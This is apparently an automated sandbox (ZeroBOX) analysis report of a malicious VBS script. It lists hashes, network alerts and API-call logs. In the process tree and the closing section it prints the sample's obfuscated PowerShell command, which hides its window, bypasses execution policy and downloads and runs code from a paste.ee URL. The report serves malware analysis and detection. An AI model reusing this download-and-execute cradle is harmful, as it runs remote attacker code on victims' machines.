Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 29, 2024, 5:03 p.m.	July 29, 2024, 5:05 p.m.

Size	8.3KB
Type	ASCII text, with CRLF line terminators
MD5	`44c6625fcc0a287d7d618359268c9abf`
SHA256	`a0b0138b7c5f2160cb3a07799b45dafd20f3909ac89744ef97efe193f98e3170`
CRC32	`37506482`
ssdeep	`192:GiFSTRuYgmY9CfjdUxdNGwpw3xb4FK+F8S7jXsaBZPk+oyRcaMu+JNeit0kusM8B:Z80nK`
Yara	Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\vnm.txt.vbs
3056
- cmd.exe "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2188
  - powershell.exe POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    2312

Name	Response	Post-Analysis Lookup
paste.ee	A 172.67.187.200 A 104.21.84.67	104.21.84.67

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.187.200	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.102:63709 -> 164.124.101.2:53	2054041	ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)	Misc activity
TCP 192.168.56.102:49164 -> 172.67.187.200:443	2034978	ET POLICY Pastebin-style Service (paste .ee) in TLS SNI	Potential Corporate Privacy Violation
TCP 192.168.56.102:49164 -> 172.67.187.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49164 172.67.187.200:443	C=US, O=Google Trust Services, CN=WE1	CN=paste.ee	db:ac:96:3c:aa:07:4d:6f:90:48:a6:34:79:1d:71:cf:4d:ef:d9:c2

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 29, 2024, 5:03 p.m.			0	0

Command line console output was observed (11 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: IsPublic IsSerial Name BaseType console_handle: 0x0000001b	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000023	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000027	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: True True Byte[] System.Array console_handle: 0x0000002b	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: Invoke-Expression : The '<' operator is reserved for future use. console_handle: 0x0000003f	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: At line:1 char:4 console_handle: 0x0000004b	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: + IeX <<<< (NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('https://paste.ee/d/DIWK2/ console_handle: 0x00000057	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: + CategoryInfo : ParserError: (<:OperatorToken) [Invoke-Expressio console_handle: 0x0000006f	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: n], ParseException console_handle: 0x0000007b	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: + FullyQualifiedErrorId : RedirectionNotSupported,Microsoft.PowerShell.Com console_handle: 0x00000087	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: mands.InvokeExpressionCommand console_handle: 0x00000093	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003224d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003224d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003224d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003220d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003220d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003220d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003220d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003220d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003220d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00321bd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00321bd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00321bd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003226d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003226d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003226d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003226d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003226d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003226d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003226d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003226d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003226d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003226d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00321c90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00321c90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bf390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 29, 2024, 5:03 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://paste.ee/d/DIWK2/0

Performs some HTTP requests (1 event)

request

GET https://paste.ee/d/DIWK2/0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 161 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b57000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b59000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
